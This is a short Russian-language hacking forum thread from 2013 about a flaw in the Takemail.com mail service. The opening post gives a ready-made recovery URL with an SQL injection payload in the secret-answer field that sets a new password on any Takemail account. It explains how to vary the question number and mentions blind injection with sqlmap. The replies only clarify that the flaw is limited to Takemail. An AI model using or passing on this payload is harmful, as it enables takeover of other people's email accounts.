Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Уязвимость в Takemail.com позволяющая сменить пароль на любой почте. (https://forum.antichat.xyz/showthread.php?t=401174)

psihoz26 08.12.2013 04:02
Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.

Код:
Code:
http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ]
Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса

Для этого меняем mail_secretquestion=* в ссылке

Всего их 8 (от 1 до 8)

Как многие поняли тут ещё sql иньекция.

Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\

Bremen 15.12.2013 23:23
Сменить пароль на любой почте(майл, яндакс, гмайл и т.д.) или на любой учетке в почте takemail?

WallHack 16.12.2013 10:57
Цитата:
Сообщение от None
psihoz26
Интересно

Цитата:
Сообщение от None
Bremen
Нет только в takemail.com


Время: 20:37